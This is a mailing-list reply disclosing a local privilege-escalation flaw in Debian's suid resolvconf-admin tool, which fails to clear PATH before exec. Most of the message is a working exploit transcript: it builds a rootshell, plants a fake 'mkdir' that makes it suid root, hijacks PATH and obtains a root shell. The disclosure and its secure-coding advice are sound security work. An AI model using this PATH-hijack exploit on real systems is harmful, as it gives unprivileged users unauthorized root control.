Re: Fixing wg-quick's DNS= directive with a hatchet

["Jason A. Donenfeld" <Jason@zx2c4.com>]

On Sat, Oct 28, 2017 at 4:35 PM, Daniel Kahn Gillmor
<dkg@fifthhorseman.net> wrote:
> I actually shipped the resolvconf-admin package in debian to provide
> some kind of filtering interface to avoid total garbage from the network
> getting accidentally passed through to arbitrary resolvconf plugins.

By the way, the program you wrote introduces a trivial local privilege
escalation vulnerability into Debian, since not all available
providers of the resolvconf binary set PATH themselves. Always clear
environment variables yourself before exec'ing anything in an suid
executable. Here's an exploit:

unpriv@scw-968260:~$ id
uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins)

unpriv@scw-968260:~$ stat /usr/bin/resolvconf-admin
  File: /usr/bin/resolvconf-admin
  Size: 24736           Blocks: 56         IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 2897743     Links: 1
Access: (4754/-rwsr-xr--)  Uid: (    0/    root)   Gid: (
114/resolvconf-admins)
Access: 2017-10-29 21:56:25.709185001 +0000
Modify: 2017-10-29 21:55:04.529185001 +0000
Change: 2017-10-29 21:55:41.449185001 +0000
 Birth: -

unpriv@scw-968260:~$ echo 'main() { setuid(0); setgid(0);
execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c

unpriv@scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0);
chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c

unpriv@scw-968260:~$ export PATH="$PWD:$PATH"

unpriv@scw-968260:~$ resolvconf-admin add eth0 8.8.8.8
Cannot write to /run/resolvconf/lock

unpriv@scw-968260:~$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)